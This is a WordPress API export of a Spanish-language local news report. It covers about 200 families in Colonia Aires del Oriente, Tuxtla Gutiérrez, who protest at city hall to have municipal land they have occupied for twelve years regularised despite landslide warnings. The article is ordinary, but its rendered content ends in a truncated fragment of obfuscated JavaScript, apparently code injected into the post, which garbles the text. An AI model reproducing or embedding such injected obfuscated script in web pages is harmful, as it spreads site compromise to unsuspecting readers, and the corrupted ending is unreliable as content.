{"id":10523,"date":"2023-06-13T03:14:17","date_gmt":"2023-06-13T03:14:17","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=10523"},"modified":"2023-06-13T03:14:18","modified_gmt":"2023-06-13T03:14:18","slug":"piden-habitantes-de-aires-del-oriente-regularizacion-de-predio","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=10523","title":{"rendered":"Piden habitantes de Aires del Oriente regularizaci\u00f3n de predio"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/FB_IMG_1686625885435-1024x768.jpg\" alt=\"\" class=\"wp-image-10524\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/FB_IMG_1686625885435-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/FB_IMG_1686625885435-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/FB_IMG_1686625885435-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/FB_IMG_1686625885435.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Rodolfo Flores.<\/p>\n\n\n\n<p>12 de junio del 2023. Tuxtla Guti\u00e9rrez. &#8211; Decenas de habitantes de la Segunda Secci\u00f3n de la Colonia Aires de Oriente, de Tuxtla Guti\u00e9rrez realizaron una protesta pac\u00edfica en la entrada principal del Ayuntamiento, para pedir la regularizaci\u00f3n de los predios.<\/p>\n\n\n\n<p>De acuerdo con los manifestantes, se trata de una extension de 4 hect\u00e1reas la que han ocupado desde hace m\u00e1s de 12 a\u00f1os.<\/p>\n\n\n\n<p>Informaron que, son familias de bajos recursos, que se vieron en la necesidad de irse a vivir en este lugar de la capital chiapaneca, junto con sus familiares.<\/p>\n\n\n\n<p>Son 200 familias, las que actualmente ocupan estos terrenos que fueron lotificados en medidas de 10&#215;20 y 6&#215;19, y as\u00ed fueron repartidos a familias necesitadas.<\/p>\n\n\n\n<p>De acuerdo con los habitantes, la petici\u00f3n es para la regularizaci\u00f3n de estos predios, pues aseguran que han sido notificados con ser desalojados.<\/p>\n\n\n\n<p>\u201cNosotros estamos dispuestos a realizar el pago por estos predios, no queremos que nos regalen, eso es lo que pedimos en esta protesta pac\u00edfica\u201d, expresaron.<\/p>\n\n\n\n<p>En este sentido dieron a conocer que, las autoridades municipales les han informado que, estos terrenos no pueden ser habitado por la inestabilidad y riesgo de deslizamiento de ladera que presentan.<\/p>\n\n\n\n<p>Sin embargo, dan a conocer que, no tienen otro espacio donde vivir, por ello est\u00e1n dispuestos a quedarse, \u201cadem\u00e1s no hemos tenido problemas con las viviendas, tampoco tenemos donde ir a vivir\u201d.<\/p>\n\n\n\n<p>Mari \u201cN\u201d, quien habita en este lugar desde hace 12 a\u00f1os, detall\u00f3 que, han acudido ante las oficinas del PROVICH y les han notificado que no los deber\u00edan desalojar.<\/p>\n\n\n\n<p>\u201cEl predio de nosotros que ocupamos es del municipio por ello, es lo que nosotros estamos pidiendo la regularizaci\u00f3n y con ello nosotros podamos tener ya en la parte legal la casa, ser propietarios y contar con una escritura\u201d, remarc\u00f3.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Rodolfo Flores. 12 de junio del 2023. Tuxtla Guti\u00e9rrez. &#8211; Decenas de habitantes de la Segunda Secci\u00f3n de la Colonia Aires de Oriente, de Tuxtla Guti\u00e9rrez realizaron una protesta pac\u00edfica en la entrada principal del Ayuntamiento, para pedir la regularizaci\u00f3n de los predios. De acuerdo con los manifestantes, se trata de una extension de 4 &hellip;<\/p>\n","protected":false},"author":2,"featured_media":10524,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-10523","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10523","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=10523"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10523\/revisions"}],"predecessor-version":[{"id":10525,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10523\/revisions\/10525"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/10524"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=10523"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=10523"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=10523"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}